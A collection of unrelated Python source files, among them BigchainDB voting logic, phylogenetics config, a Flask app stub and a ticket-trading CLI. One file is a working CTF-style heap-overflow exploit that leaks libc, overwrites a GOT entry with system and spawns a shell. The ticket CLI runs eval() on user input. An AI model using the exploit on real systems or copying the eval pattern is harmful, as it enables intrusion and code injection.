.insert(r.json(block.to_str()), durability=durability))
def transaction_exists(self, transaction_id):
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)\
.get_all(transaction_id, index='transaction_id'))
return len(response.items) > 0
def prepare_genesis_block(self):
"""Prepare a genesis block."""
metadata = {'message': 'Hello World from the BigchainDB'}
transaction = Transaction.create([self.me], [self.me],
metadata=metadata)
# NOTE: The transaction model doesn't expose an API to generate a
# GENESIS transaction, as this is literally the only usage.
transaction.operation = 'GENESIS'
transaction = transaction.sign([self.me_private])
# create the block
return self.create_block([transaction])
def create_genesis_block(self):
"""Create the genesis block
Block created when bigchain is first initialized. This method is not atomic, there might be concurrency
problems if multiple instances try to write the genesis block when the BigchainDB Federation is started,
but it's a highly unlikely scenario.
"""
# 1. create one transaction
# 2. create the block with one transaction
# 3. write the block to the bigchain
blocks_count = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.count())
if blocks_count:
raise exceptions.GenesisBlockAlreadyExistsError('Cannot create the Genesis block')
block = self.prepare_genesis_block()
self.write_block(block, durability='hard')
return block
def vote(self, block_id, previous_block_id, decision, invalid_reason=None):
"""Create a signed vote for a block given the
:attr:`previous_block_id` and the :attr:`decision` (valid/invalid).
Args:
block_id (str): The id of the block to vote on.
previous_block_id (str): The id of the previous block.
decision (bool): Whether the block is valid or invalid.
invalid_reason (Optional[str]): Reason the block is invalid
"""
if block_id == previous_block_id:
raise exceptions.CyclicBlockchainError()
vote = {
'voting_for_block': block_id,
'previous_block': previous_block_id,
'is_block_valid': decision,
'invalid_reason': invalid_reason,
'timestamp': gen_timestamp()
}
vote_data = serialize(vote)
signature = crypto.SigningKey(self.me_private).sign(vote_data.encode())
vote_signed = {
'node_pubkey': self.me,
'signature': signature,
'vote': vote
}
return vote_signed
def write_vote(self, vote):
"""Write the vote to the database."""
self.connection.run(
r.table('votes')
.insert(vote))
def get_last_voted_block(self):
"""Returns the last block that this node voted on."""
try:
# get the latest value for the vote timestamp (over all votes)
max_timestamp = self.connection.run(
r.table('votes', read_mode=self.read_mode)
.filter(r.row['node_pubkey'] == self.me)
.max(r.row['vote']['timestamp']))['vote']['timestamp']
last_voted = list(self.connection.run(
r.table('votes', read_mode=self.read_mode)
.filter(r.row['vote']['timestamp'] == max_timestamp)
.filter(r.row['node_pubkey'] == self.me)))
except r.ReqlNonExistenceError:
# return last vote if last vote exists else return Genesis block
res = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.filter(util.is_genesis_block))
block = list(res)[0]
return Block.from_dict(block)
# Now the fun starts. Since the resolution of timestamp is a second,
# we might have more than one vote per timestamp. If this is the case
# then we need to rebuild the chain for the blocks that have been retrieved
# to get the last one.
# Given a block_id, mapping returns the id of the block pointing at it.
mapping = {v['vote']['previous_block']: v['vote']['voting_for_block']
for v in last_voted}
# Since we follow the chain backwards, we can start from a random
# point of the chain and "move up" from it.
last_block_id = list(mapping.values())[0]
# We must be sure to break the infinite loop. This happens when:
# - the block we are currenty iterating is the one we are looking for.
# This will trigger a KeyError, breaking the loop
# - we are visiting again a node we already explored, hence there is
# a loop. This might happen if a vote points both `previous_block`
# and `voting_for_block` to the same `block_id`
explored = set()
while True:
try:
if last_block_id in explored:
raise exceptions.CyclicBlockchainError()
explored.add(last_block_id)
last_block_id = mapping[last_block_id]
except KeyError:
break
res = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get(last_block_id))
return Block.from_dict(res)
def get_unvoted_blocks(self):
"""Return all the blocks that have not been voted on by this node.
Returns:
:obj:`list` of :obj:`dict`: a list of unvoted blocks
"""
unvoted = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.filter(lambda block: r.table('votes', read_mode=self.read_mode)
.get_all([block['id'], self.me], index='block_and_voter')
.is_empty())
.order_by(r.asc(r.row['block']['timestamp'])))
# FIXME: I (@vrde) don't like this solution. Filtering should be done at a
# database level. Solving issue #444 can help untangling the situation
unvoted_blocks = filter(lambda block: not util.is_genesis_block(block), unvoted)
return unvoted_blocks
def block_election_status(self, block_id, voters):
"""Tally the votes on a block, and return the status: valid, invalid, or undecided."""
votes = self.connection.run(r.table('votes', read_mode=self.read_mode)
.between([block_id, r.minval], [block_id, r.maxval], index='block_and_voter'))
votes = list(votes)
n_voters = len(voters)
voter_counts = collections.Counter([vote['node_pubkey'] for vote in votes])
for node in voter_counts:
if voter_counts[node] > 1:
raise exceptions.MultipleVotesError('Block {block_id} has multiple votes ({n_votes}) from voting node {node_id}'
.format(block_id=block_id, n_votes=str(voter_counts[node]), node_id=node))
if len(votes) > n_voters:
raise exceptions.MultipleVotesError('Block {block_id} has {n_votes} votes cast, but only {n_voters} voters'
.format(block_id=block_id, n_votes=str(len(votes)), n_voters=str(n_voters)))
# vote_cast is the list of votes e.g. [True, True, False]
vote_cast = [vote['vote']['is_block_valid'] for vote in votes]
# prev_block are the ids of the nominal prev blocks e.g.
# ['block1_id', 'block1_id', 'block2_id']
prev_block = [vote['vote']['previous_block'] for vote in votes]
# vote_validity checks whether a vote is valid
# or invalid, e.g. [False, True, True]
vote_validity = [self.consensus.verify_vote_signature(voters, vote) for vote in votes]
# element-wise product of stated vote and validity of vote
# vote_cast = [True, True, False] and
# vote_validity = [False, True, True] gives
# [True, False]
# Only the correctly signed votes are tallied.
vote_list = list(compress(vote_cast, vote_validity))
# Total the votes. Here, valid and invalid refer
# to the vote cast, not whether the vote itself
# is valid or invalid.
n_valid_votes = sum(vote_list)
n_invalid_votes = len(vote_cast) - n_valid_votes
# The use of ceiling and floor is to account for the case of an
# even number of voters where half the voters have voted 'invalid'
# and half 'valid'. In this case, the block should be marked invalid
# to avoid a tie. In the case of an odd number of voters this is not
# relevant, since one side must be a majority.
if n_invalid_votes >= math.ceil(n_voters / 2):
return Bigchain.BLOCK_INVALID
elif n_valid_votes > math.floor(n_voters / 2):
# The block could be valid, but we still need to check if votes
# agree on the previous block.
#
# First, only consider blocks with legitimate votes
prev_block_list = list(compress(prev_block, vote_validity))
# Next, only consider the blocks with 'yes' votes
prev_block_valid_list = list(compress(prev_block_list, vote_list))
counts = collections.Counter(prev_block_valid_list)
# Make sure the majority vote agrees on previous node.
# The majority vote must be the most common, by definition.
# If it's not, there is no majority agreement on the previous
# block.
if counts.most_common()[0][1] > math.floor(n_voters / 2):
return Bigchain.BLOCK_VALID
else:
return Bigchain.BLOCK_INVALID
else:
return Bigchain.BLOCK_UNDECIDED
|
from .baseclock import BaseClock
from beastling.util import xml
class RandomLocalClock(BaseClock):
__type__ = 'random'
def __init__(self, clock_config, global_config):
BaseClock.__init__(self, clock_config, global_config)
self.is_strict = False
self.correlated = clock_config.correlated
self.estimate_variance = True if clock_config.estimate_variance is None \
else clock_config.estimate_variance
def add_state(self, state):
BaseClock.add_state(self, state)
xml.stateNode(
state,
text=False,
id="Indicators.c:%s" % self.name,
spec="parameter.BooleanParameter",
dimension=42)
xml.stateNode(
state,
text="0.1",
id="clockrates.c:%s" % self.name,
spec="parameter.RealParameter",
dimension=42)
self.shape_id = "randomClockGammaShape:%s" % self.name
# Domain and initial values for Gamma params copied from rate heterogeneity
# implementation in BaseModel
xml.parameter(
state, text="5.0", id=self.shape_id, name="stateNode", lower="1.1", upper="1000.0")
self.scale_id = "randomClockGammaScale:%s" % self.name
xml.parameter(state, text="0.2", id=self.scale_id, name="stateNode")
def add_prior(self, prior):
BaseClock.add_prior(self, prior)
# Gamma prior over rates
sub_prior = xml.prior(
prior,
id="RandomRatesPrior.c:%s" % self.name,
name="distribution",
x="@clockrates.c:%s" % self.name)
xml.Gamma(
sub_prior,
id="RandomRatesPrior:%s" % self.name,
name="distr",
alpha="@%s" % self.shape_id,
beta="@%s" % self.scale_id)
# Exponential prior over Gamma scale parameter
# (mean param copied from rate heterogeneity implementation in BaseModel)
if self.estimate_variance:
sub_prior = xml.prior(
prior,
id="randomClockGammaScalePrior.s:%s" % self.name,
name="distribution",
x="@%s" % self.shape_id)
xml.Exponential(
sub_prior,
id="randomClockGammaScalePriorExponential.s:%s" % self.name,
mean="0.23",
name="distr")
# Poisson prior over number of rate changes
sub_prior = xml.prior(
prior, id="RandomRateChangesPrior.c:%s" % self.name, name="distribution")
xml.x(
sub_prior,
id="RandomRateChangesCount:%s" % self.name,
spec="util.Sum",
arg="@Indicators.c:%s" % self.name)
poisson = xml.distr(
sub_prior,
id="RandomRatechangesPoisson.c:%s" % self.name,
spec="beast.math.distributions.Poisson")
xml.parameter(
poisson,
text="0.6931471805599453",
id="RandomRateChangesPoissonLambda:%s" % self.name,
estimate=False,
name="lambda")
# Should we be estimating and have a prior on the Poisson parameter?
def add_branchrate_model(self, beast):
xml.branchRateModel(
beast,
attrib={"clock.rate":self.mean_rate_idref},
id="RandomLocalClock.c:%s"%self.name,
spec="beast.evolution.branchratemodel.RandomLocalClockModel",
indicators="@Indicators.c:%s" % self.name,
rates="@clockrates.c:%s" % self.name,
ratesAreMultipliers=self.correlated,
tree="@Tree.t:beastlingTree")
self.branchrate_model_id = "RandomLocalClock.c:%s" % self.name
def add_operators(self, run):
BaseClock.add_operators(self, run)
# Operate on indicators
xml.operator(
run,
id="IndicatorsBitFlip.c:%s" % self.name,
spec="BitFlipOperator",
parameter="@Indicators.c:%s" % self.name,
weight="15.0")
# Operate on branch rates
xml.operator(
run,
id="ClockRateScaler.c:%s" % self.name,
spec="ScaleOperator",
parameter="@clockrates.c:%s" % self.name,
scaleFactor="0.5",
weight="15.0")
# Up/down for Gamma params
if self.estimate_variance:
updown = xml.operator(
run,
id="randomClockGammaUpDown:%s" % self.name,
spec="UpDownOperator",
scaleFactor="0.5",
weight="1.0")
xml.parameter(updown, idref=self.shape_id, name="up")
xml.parameter(updown, idref=self.scale_id, name="down")
def add_param_logs(self, logger):
BaseClock.add_param_logs(self, logger)
xml.log(logger, idref="Indicators.c:%s" % self.name)
xml.log(logger, idref="clockrates.c:%s" % self.name)
xml.log(logger, idref="RandomRateChangesCount:%s" % self.name)
xml.log(logger, idref=self.shape_id)
|
from zio import *
import sys,os,subprocess,time
'''
checksec --file domain_db
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH domain_db
note:
http://libcdb.com/search?symbolA=__libc_start_main&addressA=0xf7e513e0&symbolB=setsockopt&addressB=0xf7f246d0
libc info:
Operating System:
Ubuntu Linux
type:
ELF
architecture:
x86
download:
libc-2.15_1.so
run:
export LD_PRELOAD=/root/Desktop/IMDB/libc.so.6
while true;do nc -vv -l -p 10001 -e ./domain_db;killall -s 9 domain_db;done
reference:
http://www.openwall.com/lists/oss-security/2015/01/27/9
'''
def exploit(host):
io = None
try:
io = zio(host, timeout=1000, print_read=False, print_write=False)
if not io :
raise Exception
except:
print 'can\'t caonnect server!'
exit(0)
def add_domain(name):
assert len(name) < 0x800
io.read_until('>')
io.writeline('1')
io.writeline(name)
def edit_domain(id, name):
assert len(name) < 0x800
io.read_until('>')
io.writeline('2')
io.writeline(str(id))
io.writeline(name)
def remove_domain(id):
io.read_until('>')
io.writeline('3')
io.writeline(str(id))
def list_domain():
io.read_until('>')
io.writeline('4')
def lookup_domain(id):
io.read_until('>')
io.writeline('5')
io.writeline(str(id))
#leak heap base
def leak_heap():
pass
#leak libc base
def leak_libc():
pass
fake_size = l16(0x3031)
ghost_size = 0x400 - 16*1 - 4*2
chunk_0 = '0' * ghost_size + fake_size
add_domain(chunk_0)
chunk_1 = '1'* (0x400 - 0x88)
add_domain(chunk_1)
# if P->fd_nextsize != NULL ; then will do the below checking for large bins unlinking:
# 1. victim->fd_nextsize->bk_nextsize == victim
# 2. victim->bk_nextsize->fd_nextsize == victim
fd_next_large_size = '\x00\x00\x00\x00' # set to NULL that will go pass the safe-unlink checking
chunk_2 = '2222' + '2222' + fd_next_large_size + '2222' + '2' * (0x20 - 4*4)
add_domain(chunk_2)
# chunk_3 will be overwritten by chunk_5
chunk_3 = '3'* 0x20
add_domain(chunk_3)
# free chunk_1 :
# the 0x400 bytes heap buffer that was allocated by gethostnamebyhost
# will take replace of the one which chunk_1 deallocated!
remove_domain(1)
# free chunk_2
remove_domain(2)
# overwite the size field of chunk_2
lookup_domain(0)
# just for chunk padding
chunk_4 = '4'* 0x20
add_domain(chunk_4)
# read_where_what
gethost_got = 0x804B034
read_where = l32(gethost_got)
chunk_5 = '5'*0x28 + read_where
add_domain(chunk_5) # overwrite chunk_3
# leakage libc info
list_domain()
io.read_until('<3> ')
gethostbyname = l32(io.read(4))
print '[+] gethostbyname\t@\t{0}'.format(hex(gethostbyname))
libc_base = gethostbyname - 0x1020c0 #remote
print '[+] libc_base\t\t@\t{0}'.format(hex(libc_base))
system = libc_base + 0x3d170
print '[+] system\t\t@\t{0}'.format(hex(system))
# write_where_what
write_what = l32(system)
edit_domain(3, write_what) # update chunk_3 for overwritting the value of gethostbyname_got with system
# get shell
cmd = '/bin/sh'
add_domain(cmd)
lookup_domain(4) # call gethostbyname but system
io.writeline('id')
io.interact()
if __name__ == '__main__':
host = ('127.0.0.1',10001)
exploit(host)
|
#!/usr/bin/env python
# .. See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ensembl.production.core.config import load_config_yaml
class config():
config_file_path = os.environ.get('EVENT_CONFIG_PATH', os.path.join(os.path.dirname(__file__),
'event_config.dev.yaml'))
file_config = load_config_yaml(config_file_path)
report_server = os.environ.get("REPORT_SERVER",
file_config.get('report_server', "amqp://guest:guest@localhost:5672/"))
report_exchange = os.environ.get("REPORT_EXCHANGE",
file_config.get('report_exchange', 'event_report_exchange'))
report_exchange_type = os.environ.get("REPORT_EXCHANGE_TYPE",
file_config.get('report_exchange_type', 'topic'))
event_uri = os.environ.get("EVENT_URI",
file_config.get('event_uri', 'http://localhost:5000/'))
class EventConfig(config):
"""Config For Event App """
event_lookup = os.environ.get("EVENT_LOOKUP_FILE",
config.file_config.get('event_lookup_file',
os.path.join(os.path.dirname(__file__), "./event_lookup.json")))
process_lookup = os.environ.get("PROCESS_LOOKUP_FILE",
config.file_config.get('process_lookup_file',
os.path.join(os.path.dirname(__file__), "./process_lookup.json")))
# hive_url = os.environ.get("HIVE_URL",config.file_config.get('hive_url', ''))
# farm_user = os.environ.get("FARM_USER",config.file_config.get('user', ''))
ES_HOST = os.environ.get('ES_HOST', config.file_config.get('es_host', ''))
ES_PORT = os.environ.get('ES_PORT', config.file_config.get('es_port', ''))
ES_INDEX = os.environ.get('ES_INDEX', config.file_config.get('es_index', 'reports_workflow'))
RELEASE = os.environ.get('ENS_RELEASE', config.file_config.get('ens_release', '105'))
EG_RELEASE = os.environ.get('EG_RELEASE', config.file_config.get('eg_release', '52'))
RR_RELEASE = os.environ.get('RR_RELEASE', config.file_config.get('rr_release', '24'))
class EventCeleryConfig(config):
""" Config For Celery App"""
broker_url = os.environ.get("CELERY_BROKER_URL",
config.file_config.get('celery_broker_url', 'pyamqp://guest:guest@localhost:5672/'))
result_backend = os.environ.get("CELERY_RESULT_BACKEND",
config.file_config.get('celery_result_backend', 'rpc://guest:guest@localhost:5672/'))
smtp_server = os.environ.get("SMTP_SERVER",
config.file_config.get('smtp_server', 'localhost'))
from_email_address = os.environ.get("FROM_EMAIL_ADDRESS",
config.file_config.get('from_email_address', 'ensembl-production@ebi.ac.uk'))
retry_wait = int(os.environ.get("RETRY_WAIT",
config. file_config.get('retry_wait', 60)))
task_track_started=True
result_persistent=True
task_routes = {
#'ensembl.event.celery.tasks': {'queue': 'event'},
#'ensembl.event.celery.tasks.workflow_*': {'queue': 'workflow'},
#'ensembl.event.celery.tasks.monitor_*': {'queue': 'monitor'}
}
class PySagaConfig(config):
NOAH = {
'REMOTE_HOST': os.environ.get("REMOTE_HOST_NOAH", config.file_config.get("remote_host_noah", "")),
'ADDRESS' : os.environ.get("ADDRESS_NOAH", config.file_config.get("address_noah","")),
'USER' : os.environ.get("USER", config.file_config.get("user","vinay")), # vaild user in remote host
'PASSWORD' : os.environ.get("PASSWORD", ""), # required only if ssh is not configured for remote user
'WORKING_DIR' : os.environ.get('WORKING_DIR', config.file_config.get("pwd", "/homes/vinay/new_rapid_test")) # Your working directory to store logs and temp dirs
}
CODON = {
'REMOTE_HOST': os.environ.get("REMOTE_HOST_CODON", config.file_config.get("remote_host_codon", "")),
'ADDRESS' : os.environ.get("ADDRESS_NOAH", config.file_config.get("address_noah","")),
'USER' : os.environ.get("USER", config.file_config.get("user","vinay")), # vaild user in remote host
'PASSWORD' : os.environ.get("PASSWORD", ""), # required only if ssh is not configured for remote user
'WORKING_DIR' : os.environ.get('WORKING_DIR', config.file_config.get("pwd", "/homes/vinay/new_rapid_test")) # Your working directory to store logs and temp dirs
}
DEFAULT_HOST_DETAILS = os.environ.get("DEFAULT_HOST_DETAILS", config.file_config.get("default_host_details", ""))
FARM_USER = os.environ.get("FARM_USER",config.file_config.get('user', 'vinay'))
HIVE_URL = os.environ.get("HIVE_URL", config.file_config.get("hive_url", '')) # hive database string
|
lista = list()
while True:
lista.append(int (input ('Declare o número: ')))
while True:
fim = str (input ('Deseja continuar ? '.upper())).upper()[0]
if fim in 'SN':
break
if fim in 'N':
break
lista.sort(reverse=True) #Reverter os valores ordenados dentro da lista
print (f'\nNa lista temos {len(lista)} números')
print(f'Os valores da sua lista são: {lista}')
if 5 in lista:
print ('O valor 5 esta dentro da lista!')
else:
print ('O valor 5 NÃO esta dentro da lista!')
|
from flask import Flask
app = Flask(__name__)
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
# Set the secret key to some random bytes. Keep this really secret!
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
from app import routes |
class Solution(object):
# 递归+记忆化,k超大时做优化,退换为无限次买卖
def maxProfit(self, k, prices):
"""
:type k: int
:type prices: List[int]
:rtype: int
"""
if not prices or k<=0:
return 0
n = len(prices)
if k>n/2:
dp = [[0 for _ in xrange(2)] for _ in xrange(n)]
dp[0][0] = 0
dp[0][1] = -prices[0]
for i in xrange(1,n):
dp[i][0] = max(dp[i-1][0],dp[i-1][1]+prices[i])
dp[i][1] = max(dp[i-1][1],dp[i-1][0]-prices[i])
return max(dp[n-1][0],0)
mem = [[[-1 for _ in xrange(2)] for _ in xrange(k+1)] for _ in xrange(n)]
def dfs(index,count,status):
if index==n or (count==k and status==0):
return 0
if mem[index][count][status]>-1:
return mem[index][count][status]
a = dfs(index+1,count,status)
b,c = 0,0
if status:
b = dfs(index+1,count,0)+prices[index]
else:
c = dfs(index+1,count+1,1)-prices[index]
mem[index][count][status] = max(a,b,c)
return mem[index][count][status]
return dfs(0,0,0)
# 递归(超时)
def maxProfit(self, k, prices):
"""
:type k: int
:type prices: List[int]
:rtype: int
"""
if not prices:
return 0
n = len(prices)
def dfs(index,count,status):
if index==n or (count==k and status==0):
return 0
a = dfs(index+1,count,status)
b,c = 0,0
if status:
b = dfs(index+1,count,0)+prices[index]
else:
c = dfs(index+1,count+1,1)-prices[index]
return max(a,b,c)
return dfs(0,0,0)
|
# -*- coding: utf-8 -*-
from .clone import CloneCommand
from .commit import CommitCommand
from .fetch import FetchCommand
from .init import InitCommand
__all__ = ["CloneCommand", "CommitCommand", "FetchCommand", "InitCommand"]
|
from provision.main import parse_args
from typing import Any, List
from azure import eventhub
from azure.cosmosdb import table
import logging
import json
import torch
import argparse
import os
import sys
def create_logger(log_level: int = logging.DEBUG) -> logging.Logger:
logger = logging.Logger(name="processor", level=log_level)
formater = logging.Formatter(
fmt='[%(levelname)s] [%(asctime)s] [%(filename)s] [L%(lineno)s] %(message)s')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(fmt=formater)
logger.addHandler(stream_handler)
return logger
LOGGER = create_logger(log_level=logging.DEBUG)
parser = argparse.ArgumentParser(
"Processing a batch of events from EventHub and save to CosmosDB")
parser.add_argument('-c', '--config', type=str,
default='/src/config.json', help='The path to config file')
parser.add_argument('-m', '--model', type=str, default='/src/best.pth',
help='The path to the model weights file. It should be compatibile with PyTorch v1.8.0 or later.')
ARGS = parser.parse_args()
def read_config(filepath: str = "./config.json") -> dict:
return json.load(open(filepath, 'r'))
try:
CONFIG = read_config(ARGS.config)
except Exception as e:
LOGGER.error(e)
sys.exit(1)
MODEL_PATH = ARGS.model
if not os.path.exists(MODEL_PATH):
LOGGER.error(f"Could not find the model {MODEL_PATH}. Exiting ...")
sys.exit(1)
def load_model(model_path, config: dict) -> torch.Module:
"""
This loads the model using PyTorch.
TODO if using a third party libs, then add them.
:param model_path the path to the model weights
:param config the JSON object config
:return Loaded model
"""
pass
def fetch_events(config: dict) -> List[Any]:
"""
Fetch the events from EventHub.
:param config the JSON object config
:return a list of events
"""
pass
def process_events(events: List[Any], config: dict, model: torch.Module) -> List[Any]:
"""
Running inference on fetched events from EventHub.
:param events fetched raw events
:param config the JSON object config
:param model the model for inference
:return a list of processed events
"""
pass
def save_results_to_cosmosdb(events: List[Any], config: dict) -> None:
"""
Save computed results to CosmosDB Table.
:param events computed events
:param model the model for inference
:return
"""
pass
def main():
pass
if __name__ == '__main__':
main()
|
from pysdd.util import BitArray
import sys
import os
import logging
from pathlib import Path
logger = logging.getLogger("pysdd")
def test_bitarray1():
b = BitArray(10)
print(b)
assert b[4] is False
assert b[3] is False
assert b[2] is False
b[4] = 1
b[2] = True
print(b)
assert b[4] is True
assert b[3] is False
assert b[2] is True
b[4] = 0
b[2] = False
print(b)
assert b[4] is False
assert b[3] is False
assert b[2] is False
def test_bitarray2():
b = BitArray(100) # more than 32 bits
print(b)
assert b[60] is False
assert b[90] is False
b[60] = True
b[90] = True
print(b)
assert b[60] is True
assert b[90] is True
if __name__ == "__main__":
logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler(sys.stdout)
logger.addHandler(sh)
directory = Path(os.environ.get('TESTDIR', Path(__file__).parent))
print(f"Saving files to {directory}")
test_bitarray1()
|
import os
import sys
import time
import requests
import json
class MajPoll:
def __init__(self, question):
self.question = question
self.user_answers = { }
self.has_ended = False
def vote(self, answer, user):
if self.has_ended:
return # voting has concluded
self.user_answers[user] = answer.lower()
def get_total_vote_count(self):
return len(self.user_answers.keys())
def get_answers(self):
answers = {}
for a in self.user_answers.values():
if a in answers:
answers[a] += 1
else:
answers[a] = 1
return dict(sorted(answers.items(), key=lambda item: item[1], reverse=True))
def get_poll_results(self):
msg = f" Total votes: {self.get_total_vote_count()} || "
answers = self.get_answers()
distinct_counts = []
for c in answers.values():
if c not in distinct_counts:
distinct_counts.append(c)
for count in distinct_counts:
p = "person" if count == 1 else "people"
answers = []
for k,v in self.get_answers().items():
if v != count: continue
answers.append(k)
msg += f"{count} {p} voted ... {' - '.join(answers)} ██ "
return msg
def demo_poll():
p = MajPoll("what is your favorite beer?")
p.vote("pilsner", "steve")
p.vote("hazy ipa", "bob")
p.vote("hazy ipa", "cheryl")
p.vote("hazy ipa", "alice")
p.vote("stout", "alice")
p.has_ended = True
p.vote("pilsner", "dave")
print(p.get_answers())
print(p.get_total_vote_count())
print(p.get_poll_results())
|
#!/usr/bin/python
import sys
import ZeroBorg
zb = ZeroBorg.ZeroBorg()
zb.Init()
zb.SetMotor1(0)
zb.SetMotor2(0)
zb.SetMotor3(0)
zb.SetMotor4(0)
|
import csv
import time
import re
status = False
user_name = ''
user_email = ''
user_password = ''
balance = -1
accFile = open('accounts.csv', 'r+')
ticketFile = open('tickets.csv', 'r+')
accReader = csv.reader(accFile)
ticketReader = csv.reader(ticketFile)
location_arg = open('frontend_locations.txt', 'r').readline()
tranFile = open(location_arg+'_transactions.csv', 'a+', newline='')
tranWriter = csv.writer(tranFile)
def main():
print('Welcome the Queens ticket trade machine')
R1()
def R1():
if status:
print('your balance:', balance) # print out the user's balance
input1 = input('type your choice:\nsell buy update logout\n')
if input1 == 'sell': # user wants to go to sell session
R4()
elif input1 == 'buy': # user wants to go to buy session
R5()
elif input1 == 'update': # user wants to go to update session
R6()
elif input1 == 'logout': # user wants to go to logout session
R7()
else: # user enters other invalid commands
print('invalid command')
R1()
if not status:
input1 = input('type your choice:\nregister login exit\n')
if input1 == 'register': # user wants to go to register session
R2()
elif input1 == 'login': # user wants to go to login session
R3()
elif input1 == 'exit': # user wants to go to exit session
R8()
else: # user enters other invalid commands
print('invalid command')
R1()
def R2():
# R2 will be the register session, which will allow user to register their account
print('register session started successfully')
try: # if inputs are missing, call R2 again
register_email, register_name, register_password, register_password2 = input('please enter your email, user '
'name, password and confirm your '
'password:\n').split(',')
except:
#optin to exit
print('please retype\nthe number of inputs should be 4 or exit')
exitOrNot = input('do you want to exit register session(type exit to leave):')
if exitOrNot == 'exit':
R1()
R2()
# do the testing for user inputs, and outputs warning if there is any error. finally, go back to R1
if not (check_register_email(register_email) and check_exits_email(register_email) and check_register_name(
register_name) and check_register_password(register_password) and check_register_password2(
register_password, register_password2)):
R1()
tranWriter.writerow(['registration', register_name, register_email, register_password,
3000]) # write registration information into file
tranFile.flush()
print('account registered')
R1()
def R3():
print('login session started successfully')
try: # if inputs are missing, call R3 again
login_email, login_password = input('please type your email and password:\n').split(',')
except:
print('please retype\nthe number of inputs should be 2')
R1()
if not (check_register_email(login_email) and check_register_password(login_password)):
R1() # check the format of inputs. return R1 if there is anything invalid
for i in accReader: # go over every user info to check login
if not i:
continue
if login_email == i[0] and login_password == i[2]:
global status, user_name, user_email, user_password, balance
# set global value to be the user info if login succeeded
user_name = i[1]
user_email = i[0]
user_password = i[2]
balance = i[3]
status = True
print('account logged in')
R1()
# return R1 if failed
print('login failed')
R1()
def R4():
print('selling session started successfully')
try: # if inputs are missing, call R4 again
ticket_name, price, quantity, date = input('please type ticket name, price, quantity, date:\n').split(',')
except:
print('please retype\nthe number of inputs should be 4')
R1()
if not (check_ticket_name(ticket_name) and check_price(price) and check_quantity_sell(quantity) and check_date(
date)):
R1() # check the format of inputs. return R1 if there is anything invalid
price = eval(price)
price = round(price, 2)
# write the transaction
tranWriter.writerow(['selling', user_email, ticket_name, price, quantity])
tranFile.flush()
print('selling transaction was created successfully')
R1()
def R5():
print('buying session started successfully')
try: # if inputs are missing, call R5 again
ticket_name, quantity = input('please type ticket name, quantity:\n').split(',')
except:
print('please retype\nthe number of inputs should be 2')
R1()
if not (check_ticket_name(ticket_name)):
R1() # check the format of inputs. return R1 if there is anything invalid
count = 0
for i in ticketReader: # go over every ticket to check if exists
if not i:
continue
if ticket_name == i[0]:
price = i[1]
aval_quantity = i[2]
count += 1
if count == 0:
print('the ticket does not exist')
R1()
if not (check_quantity_buy(price, quantity, aval_quantity)):
R1() # check the format of inputs. return R1 if there is anything invalid
price = eval(price)
price = round(price, 2)
# write the transaction
tranWriter.writerow(['buying', user_email, ticket_name, price, quantity])
tranFile.flush()
print('buying transaction was created successfully')
R1()
def R6():
print('updating session started successfully')
try: # if inputs are missing, call R6 again
ticket_name, price, quantity, date = input('please type ticket name, price, quantity, date:\n').split(',')
except:
print('please retype\nthe number of inputs should be 4')
R1()
if not (check_ticket_name(ticket_name) and check_price(price) and check_quantity_sell(quantity) and check_date(
date)):
R1() # check the format of inputs. return R1 if there is anything invalid
count = 0
for i in ticketReader: # go over every ticket to check if exists
if not i:
continue
if ticket_name == i[0] and user_email == i[3]:
count += 1
if count == 0:
print('the ticket does not exist')
R1()
price = eval(price)
price = round(price, 2)
# write the transaction
tranWriter.writerow(['updating', user_email, ticket_name, price, quantity])
tranFile.flush()
print('updating transaction was created successfully')
R1()
def R7():
global status, user_name, user_email, user_password, balance
if status: # user already logged in
print("logout successfully")
user_name = ''
user_email = ''
user_password = ''
balance = -1
status = False
else: # user has not logged in
print("you are not login\nplease enter login")
def R8():
print('exit')
# close three resource files
accFile.close()
ticketFile.close()
tranFile.close()
exit(0)
'''
this function will check the ticket name format
'''
def check_ticket_name(ticket_name):
if not (ticket_name.replace(' ','').isalnum()):
print('transaction was created unsuccessfully\nplease retype\nticket name should be '
'alphanumeric-only')
return False
if ticket_name[0].isspace() or ticket_name[len(ticket_name) - 1].isspace():
print('transaction was created unsuccessfully\nplease retype\nspace allowed only if it is not the '
'first or the last character')
return False
elif len(ticket_name) > 60:
print('transaction was created unsuccessfully\nplease retype\nthe ticket name should be no longer '
'than 60 characters')
return False
return True
'''
this function will check the price valid
'''
def check_price(price):
if not (price.isdigit()):
print('transaction was created unsuccessfully\nplease retype\nthe ticket price should be numeric')
return False
price = eval(price)
if not (10 <= price <= 100):
print('transaction was created unsuccessfully\nplease retype\nthe ticket price should be of range ['
'10, 100]')
return False
return True
'''
this function will check the quantity valid when selling
'''
def check_quantity_sell(quantity):
quantity = eval(quantity)
if not (isinstance(quantity, int)):
print('transaction was created unsuccessfully\nplease retype\nthe ticket quantity should be an '
'integer')
return False
if not (0 < quantity <= 100):
print('transaction was created unsuccessfully\nplease retype\nthe quantity of the tickets has to be '
'more than 0, and less than or equal to 100')
return False
return True
'''
this function will check date format
'''
def check_date(date):
try:
time.strptime(date, "%Y%m%d")
return True
except:
print('transaction was created unsuccessfully\nplease retype\ndate must be given in the format '
'YYYYMMDD')
return False
'''
this function will check the quantity valid when buying
'''
def check_quantity_buy(price, quantity, aval_quantity):
price = eval(price)
quantity = eval(quantity)
aval_quantity = eval(aval_quantity)
if not (isinstance(quantity, int)):
print('transaction was created unsuccessfully\nplease retype\nthe ticket quantity should be an '
'integer')
return False
if not (0 < quantity <= aval_quantity):
